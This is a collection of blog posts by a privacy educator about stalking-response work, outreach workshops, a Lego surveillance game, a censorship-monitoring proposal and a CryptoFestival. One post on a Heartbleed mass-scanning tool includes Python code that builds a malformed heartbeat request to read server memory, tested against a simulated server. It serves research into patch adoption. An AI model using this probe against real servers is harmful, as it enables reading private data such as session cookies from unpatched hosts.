Digital Stalking Response Protocol @ 32C3

I introduced the idea of a Pan-European Digital Stalking Response Protocol at the #32C3 Chaos Communication Congress, the biggest hacker conference in Europe (the talk begins at 30:08 in the video).

There is no simple go-to place for reliable information on protecting against and responding to digital stalking, and the information that is needed is also very country-specific. However, there are clear areas that need to be addressed regardless of country, and we propose the creation of a Pan-European protocol on digital stalking, which we will begin at a self-organised session here at 32C3.

Speaking at #insafe2015

IMG_20151210_085524

Last week I did two workshops for the insafe training meeting in Warsaw (photo above taken from venue).

Insafe training meetings provide an opportunity for members of the network of European Safer Internet Centres (awareness raising, helplines and youth participation) to come together to discuss the latest trends in online safety issues, and share experiences and best practice examples of empowering children and young people to stay safe online.

My 2 sessions were:

“I’ve been hacked”
Hacking, social engineering & pervasive algorithms

But have you actually been hacked? Or have you been socially engineered?
This workshop will explore the differences and similarities between the two and also look at how we may think we have agency in our decisions but often pervasive algorithms are determining what we can and can’t do.

We Can Haz ALL your information
Wearables, IoT and Big Data

As even more of our data is going to be made available through wearables and the “Internet of Things”, this workshop will look at the risks and realities behind the hype.

Digital First Aid

erstehilfe

How can we get the general public thinking about, and doing something about, security and their online presence? One way is to go out to where the general public actually are and engage with them in a way that strips away the technobabble and specialist vocabulary.

BEE SECURE is part of an organisation called SMILE (Security Made In Lëtzebuerg) whose remit is to raise awareness of digital security and promote safer internet practices among the general public (the other two branches are CASES, which reaches out to business, and CIRCL, the Computer Incident Response Center Luxembourg, a government-driven initiative that provides a systematic response facility for computer security threats and incidents).

I’ve been working with BEE SECURE on the idea of Digital First Aid to be carried out at public events and possibly in schools, where BEE SECURE already carry out a lot of training.

cloud

So the idea finally became a “Digital First Aid” post under the title #BeeFirstAid, where we dress as first responders and carry out a quick check on the devices of members of the public. Like a medical centre, we have some posters about current issues, which are shown on this page.

passwordphishing

After carrying out the brief first aid, mainly on passwords, wifi permissions and cloud permissions, we give the “patient” a prescription (see image below) of things to carry out over the next week, and recommend that for further “treatment” they visit a Digital Privacy Salon and/or the local syn2cat hackerspace.
bfah4k1
ord

Panopticon: a game of data & control

panopticon-logo-v3-black

20140728_115103

Panopticon is a Creative Commons-licensed, open source game in constant development, meaning that anyone can take the game and adapt it to their own needs. The game grew out of conversations between Maf’j and Chris, which Maf’j blogged about:

Met Chris Pinchen from Cataspanglish who is currently resident at Lighthouse. He introduced us to Techno Activism at the launch of #TA3MBTN. It was a great event of eye-opening ideas around data retention by governments, surveillance, Prism and educating the public about open data and data protection. Chris and co run CryptoParty, an event which brings people together to learn more about how to protect their identity and their online shadows and data. We talked about the next CryptoParty which is on Sunday 1st December. How do you make a tech event more family friendly? We talked about Rootbeans, a version of the game that could be fun, relevant to younger players but exploring the issues core to CryptoParty.

After a bit of Twitter ping pong we came up with Lego Panopticon. In this game players use Lego bricks to build surveillance structures by connecting to each other and exchanging ‘bits’. Players with the tallest towers can see the furthest and can therefore ‘help’ the most when it comes to informing other players with valuable information further away from their own vantage point, becoming the Google or Facebook of the game. We’ll have to meet up and hash this out but it’s exciting.

We met up at Lighthouse and Maf’j already had a version of the game that we could work on. Natalie Kane contributed the mission cards and player descriptions during and after the session and further development has taken place by playing the game at various events and incorporating player feedback into the game rules.

We used Lego as it is cheap and ubiquitous and people automatically know what to do with it. The baseboard can be made from anything, just needing to be laid out as described in the rules. We used the Lego pieces we had to hand (well, those that we could “borrow” from our kids), so you can replace them with any you have available.

Currently we have plans to develop the game for other contexts, to do a Minecraft version and a Raspberry Pi Minecraft version, and to incorporate it into the Coder Dojo in Luxembourg, as well as continuing to develop it through play. We’d love to see what others do with the game, and if you want any further information please get in touch.

Oh yes, stickers and t-shirts will be available soon….

lego-panopticon

1st version of the game

 

original

1st playing of the game at Brighton CryptoFestival

 

BjaSE_XIgAAGkRD

Playing the game at DoubleBlink R&D weekend

 

20140728_115103

Demonstrating the game at Bee Secure

Pacemaker – a #HeartBleed probing utility

Here’s a really cool quick & dirty utility that Chokepoint has made:
pacemaker

Pacemaker is a utility that scans the Alexa Top 1 million websites [1] and attempts to connect to port 443 on each of them. If the connection succeeds, Pacemaker sends a malformed TLS heartbeat request that triggers the Heartbleed [2] bug (http://heartbleed.com/) in order to read data from the server’s memory. An initial scan was performed on April 11th, where approximately 30 000 vulnerable websites were uncovered. Since then, Chokepoint Project have been re-scanning those URLs to see whether they have been patched, and that number has shrunk by about 10 000.

“By now we all know how serious an issue Heartbleed is, affecting nearly all aspects of our use of networks. We were very interested to know more about the rate of adoption of patch implementation. Despite the very good adoption in the Alexa top 1 Million, given the severity of this particular bug it is a little depressing to see that at the time of writing (2014-04-15 20:24:08) there are still 19721 sites unpatched. This might seem like a small number, but given that there are more than 246 million domains in the world and we have scanned only the top 1 Million according to Alexa, and have only scanned for webservers not for anything else, it is not unlikely that there might still be more than 5 million unpatched systems out there,” said Chokepoint Project’s Ruben Bloemgarten.

 

What Pacemaker does not do:

The URL probing tool has a 5-second timeout in which the request must complete. If a request does not return within that window, the host is marked as unresponsive and is therefore no longer counted as vulnerable, even though a timeout says nothing about whether the server has actually been patched. Timed-out URLs are not rechecked afterwards. In the same vein, it would be worth rescanning the full set of 1 million URLs, since a server may have been patched temporarily and be vulnerable again, or a site owner may have taken the site down (timing out or failing the request) without ever patching properly. URLs that do not offer SSL/TLS are also marked as non-vulnerable and are currently not rechecked. For full details, see https://github.com/l-r/heartbleed-masstest.
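How such a probe and its result bookkeeping fit together, as an added example that is not Pacemaker’s or heartbleed-masstest’s code: the record layout follows the TLS record header and RFC 6520, FakeServer is a stand-in peer that handles heartbeats with and without the bounds check OpenSSL was missing, the heap_tail bytes are constructed process memory, and the probe keeps a timeout or a refused connection as its own state rather than folding it into “not vulnerable”, which is the gap described above.

```python
"""Constructed model of a Heartbleed probe and of how to classify its outcome."""
import struct
from enum import Enum

HEARTBEAT = 0x18            # TLS record content type for heartbeat messages (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16            # RFC 6520 requires at least 16 bytes of padding
TLS_VERSION = (3, 2)        # TLS 1.1 record-layer version (assumption; any TLS version works)


def build_heartbeat_request(payload, claimed_length):
    """TLS record carrying a HeartbeatRequest whose payload_length field may exceed len(payload)."""
    body = bytes([HB_REQUEST]) + struct.pack("!H", claimed_length) + payload + b"\x00" * MIN_PADDING
    return bytes([HEARTBEAT, *TLS_VERSION]) + struct.pack("!H", len(body)) + body


def split_record(record):
    """Return (content_type, fragment) from a TLS record, or None if it is malformed."""
    if record is None or len(record) < 5:
        return None
    ctype, _, _, length = struct.unpack("!BBBH", record[:5])
    if len(record) < 5 + length:
        return None
    return ctype, record[5:5 + length]


class FakeServer:
    """Stand-in peer handling heartbeats the way OpenSSL did before and after the fix."""

    def __init__(self, patched, heap_tail=b""):
        self.patched = patched
        self.heap_tail = heap_tail  # constructed: whatever happens to follow the record buffer

    def handle(self, record):
        parsed = split_record(record)
        if parsed is None or parsed[0] != HEARTBEAT:
            return None
        fragment = parsed[1]
        if len(fragment) < 3 or fragment[0] != HB_REQUEST:
            return None
        payload_length = struct.unpack("!H", fragment[1:3])[0]
        if self.patched and 1 + 2 + payload_length + MIN_PADDING > len(fragment):
            return None  # the bounds check Heartbleed lacked: discard silently (RFC 6520)
        # Unpatched path: copy payload_length bytes from the payload pointer regardless of
        # how many bytes the record really carried, so the copy runs on into heap_tail.
        memory = fragment + self.heap_tail
        echoed = memory[3:3 + payload_length]
        # The length field here is the number of bytes actually copied, so the reply stays parseable.
        body = bytes([HB_RESPONSE]) + struct.pack("!H", len(echoed)) + echoed + b"\x00" * MIN_PADDING
        return bytes([HEARTBEAT, *TLS_VERSION]) + struct.pack("!H", len(body)) + body


class Status(Enum):
    VULNERABLE = "vulnerable"
    NOT_VULNERABLE = "not vulnerable"
    NO_TLS = "nothing listening on 443"
    UNKNOWN = "timed out"  # no evidence either way, so it must not count as patched


def probe(send, payload=b"probe"):
    """Send one over-long heartbeat through `send` (a callable taking the raw record) and classify."""
    request = build_heartbeat_request(payload, claimed_length=0x4000)
    try:
        reply = send(request)
    except ConnectionRefusedError:
        return Status.NO_TLS
    except TimeoutError:
        return Status.UNKNOWN
    parsed = split_record(reply)
    if parsed is None or parsed[0] != HEARTBEAT or len(parsed[1]) < 3:
        return Status.NOT_VULNERABLE
    echoed_length = struct.unpack("!H", parsed[1][1:3])[0]
    return Status.VULNERABLE if echoed_length > len(payload) else Status.NOT_VULNERABLE


def rescan_queue(results):
    """Hosts whose last result proves nothing about their patch state; keep them in the next pass."""
    return sorted(host for host, status in results.items() if status in (Status.UNKNOWN, Status.NO_TLS))


if __name__ == "__main__":
    leaky = FakeServer(patched=False, heap_tail=b"Cookie: session=abc123; user=alice")
    print(probe(leaky.handle), probe(FakeServer(patched=True).handle))
```

Against a real host the `send` callable would complete a TLS handshake on port 443 and read the reply with a socket timeout; the point of the separate UNKNOWN and NO_TLS states is that the rescan list keeps those hosts, instead of silently letting them drop out of the vulnerable count as the scanner above does.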

 

[1] About Alexa

Alexa Internet, Inc. is a subsidiary company of Amazon.com which provides commercial web traffic data. Its toolbar collects data on browsing behavior and transmits it to the Alexa website, where it is stored and analyzed, forming the basis for the company’s web traffic reporting. As of 2014, Alexa provides traffic data, global rankings and other information on 30 million websites, and its website is visited by over 8.8 million people monthly. https://en.wikipedia.org/wiki/Alexa_Internet

[2] About Heartbleed

Heartbleed (CVE-2014-0160) is a security bug in the open-source OpenSSL cryptography library, widely used to implement the Internet’s Transport Layer Security (TLS) protocol. The vulnerability is due to a missing bounds check in the handling of the TLS heartbeat extension (RFC 6520): the server copies as many bytes into its reply as the request’s payload_length field claims, not as many as the request actually contains. http://en.wikipedia.org/wiki/Heartbleed

Knight News Challenge proposal

Chokepoint’s joint proposal with OONI has made it to the “semi-finals” of the Knight News Challenge. The theme is How can we strengthen the Internet for free expression and innovation? The proposal is posted below but please head over to our Knight challenge page and “applaud” it. 🙂

Global Internet Monitoring Project

The internet’s potential as a medium for innovation and self-expression is hampered by increasingly invasive surveillance and censorship practices, which stifle the freedom of expression and the empowerment of marginalized voices worldwide. The incidental, anecdotal reporting on these practices is insufficient to provide policy makers, researchers and the general public with a comprehensive perspective on the scope and reach of these practices. Our goal is to provide a monitoring platform that delivers structured, up-to-date information that reflects the reality of internet censorship and surveillance, using open software, an ethical data governance framework, and peer reviewed methodologies.
knight

With the rapid growth of censorship and surveillance practices that directly or indirectly violate civil and human rights, it has become of vital importance to augment our incidental and anecdotal understanding of these practices with on-going, evidence-based reporting on what is actually happening on our networks. To achieve this requires a globally distributed network of standardized network measurement nodes, as well as powerful analysis and visualization tools.

We, the Tor project and Chokepoint Project, have over the past two years amassed extensive technical and domain-specific expertise on the detection, analysis and reporting of surveillance and censorship events. The Tor Project has been developing open standards, software and a methodology for conducting measurements. Chokepoint Project has been working on near real-time processing, analysis, visualization and contextualization of this type of data.

For this proposal, we aim to extend, improve and integrate the existing software systems and analysis tools, with the goal of enabling more comprehensive, evidence-based, and up-to-date reporting on censorship and surveillance events. Our proposal works towards this goal with a three-pronged approach:

1. Expand and improve Tor’s ooni-probe software suite, which provides the basic infrastructure to support a globally distributed measurement network.

  • Support for running ooniprobe on Raspberry Pi devices.
  • Running tests periodically, making ooniprobe a system daemon.
  • Support for remotely provisioning probes with tests and inputs to run based on their geographical location and ASN.

2. Integrate and enhance Chokepoint’s data analysis and visualization tools, to incorporate and report on data from the ooniprobe software suite.

  • Automated collection of ooniprobe yaml reports.
  • Automated processing of ooniprobe yaml reports.
  • Automated analysis of ooniprobe yaml reports.
  • Support for automated generation of analytics visualization and analytic data downloads.

3. Reach out to Tor’s and Chokepoint’s extensive list of contacts to plan the deployment of ooniprobes “on the ground”, in a selected set of 10 to 20 countries.

  • Survey creation and distribution to determine country specific internet use
  • User feedback features
  • Training material
  • Plan for software distribution

Since no country is alike, and internet use is equally diverse, any measurement needs to be contextualized into a regional socio-political framework. Surveys will be distributed to on-the-ground partner organizations to construct a measurement methodology that yields culturally relevant results.

In ONE sentence, tell us about your project to strengthen the Internet for free expression and innovation.
We believe that open and continuous knowledge detailing the innards of internet censorship reveals the cost it imposes on freedom of expression and global innovation.

 

Who will benefit from what you propose? What have you observed that makes you think that?
We believe that access to up-to-date, properly contextualized, empirically verifiable information on surveillance and censorship benefits policy makers, researchers and the general public. Currently, this information, if it is available at all, is extremely fragmented, out of date, and/or unverifiable. While the past years have seen some laudable efforts on the part of influential actors to share more information more broadly, they do not generally meet the requirements of broad (geographical) scope, timeliness, and verifiability. Since it is imperative that decisions influencing internet freedom are formulated based on facts rather than anecdotal reports, policy makers will benefit from the ability to focus on actual, rather than suspected (or merely publicized), issues. Furthermore, researchers, in particular those who explore the socio-political ramifications of the internet within the context of freedom of expression and the right to privacy, will benefit from open access to a large repository of continuously updated information. Finally, the general public will benefit, by gaining a deeper understanding and increased awareness of the prevalence of internet censorship and surveillance in their local communities and worldwide. Having spoken extensively to both policy makers and researchers over the past two years, and noting the impact of high profile intelligence revelations on public discourse worldwide, we have been strengthened in our conviction that access to timely, verifiable information, presented in an understandable fashion, is paramount to preserve the internet’s capability for innovation and self-expression in a globally connected world.

 

What progress have you made so far?
The Tor Project has developed a tool for collecting the measurements (https://gitweb.torproject.org/ooni-probe.git, https://gitweb.torproject.org/ooni-backend.git), published a peer-reviewed paper (https://www.usenix.org/conference/foci12/workshop-program/presentation/filast%C3%B2) on the methodology used, written specifications of the data format and the tests (https://github.com/TheTorProject/ooni-spec) and collected some results from a set of countries (https://ooni.torproject.org/reports/0.1/). Chokepoint Project has developed and is running a platform for the collection, processing, analysis and contextual presentation of data from multiple sources in near real-time; some live results can be seen here: https://beta.chokepointproject.net/country/CN?show=2014-03-13 . The code is not publicly available as yet; it consists of collection, processing and analytics code as well as a distributable graphic presentation front-end. More about the Chokepoint Project’s approach here: https://chokepointproject.net/about-2/

 

What would be a successful outcome for your idea or project?
Improvement of the mitigation of censorship and interference, providing faster actionable information for policy makers, tool makers, publishers and journalists to counteract impediments on free speech and innovation. An improved, continuously up-to-date overview of what is censored where, how and by whom.

 
Who is on your team, and what are their relevant experiences or skills?
Arturo Filastò is a developer at GlobaLeaks and The Tor Project. He studied Mathematics and is currently a student of Computer Science at Università di Roma “La Sapienza”. He is a well-known security researcher and regularly gives lectures at international conferences. He has trained activists in the use of security and censorship circumvention technologies. He is also the lead developer of OONI (Open Observatory of Network Interference), a project aimed at detecting and monitoring censorship in the world.

Pascal Haakmat is an analyst at Chokepoint Project. He studied Artificial Intelligence at the University of Amsterdam and is currently studying Law at the University of Amsterdam. He has several decades of experience as a programmer in both free/open source and proprietary environments. Prior to working at Chokepoint, Pascal was co-founder and CTO of the digital agency Lightmaker Amsterdam.

Ruben Bloemgarten is architect at Chokepoint Project. He has over 18 years of experience in information technology, the past 15 years as a systems engineer in the telecom industry and as an independent systems architect.

Laurier Rochon is a developer at Chokepoint Project. He studied the socio-political impacts of Free Libre Open Source Software in the Networked Media Program of Rotterdam’s Piet Zwart Institute. He has experience working on both FLOSS and proprietary projects over the last 10 years.

Location

Rome, Italy; Amsterdam, The Netherlands; Montreal, Quebec, Canada

#CryptoFestBTN Decrypted

cryptofestbtn

Two weeks have flown by since Brighton CryptoFestival which I organised in collaboration with Lighthouse and Open Rights Group. Based around the idea of

“Critical thinking & practical privacy in an age of mass surveillance”

and inspired by London CryptoFestival, Brighton CryptoParty & Festival aimed to encourage critical thinking about technology, data, surveillance, censorship and privacy as well as offer practical tips, tools and behaviour.

The CryptoFestival was free and intended for everyone; no prior technical expertise or knowledge was assumed. In general the Festival achieved what it set out to do and I’m particularly pleased that the inclusion of kids and families was picked up on, being highlighted before the day itself in posts such as Making CryptoParties Inclusive in the Open Rights Group Zine & Brighton web users offered online security tips in the Brighton & Hove News.

As well as talks and the 1st Brighton CryptoParty, the Festival also featured the first playing of the prototype of Lego Panopticon, a game developed with Maf’j Alvarez.

I was going to write up the event, but other people have already done it so much better:

Thanks to everybody who spoke on the day, the CryptoParty volunteers, Open Rights Group, and the Lighthouse crew.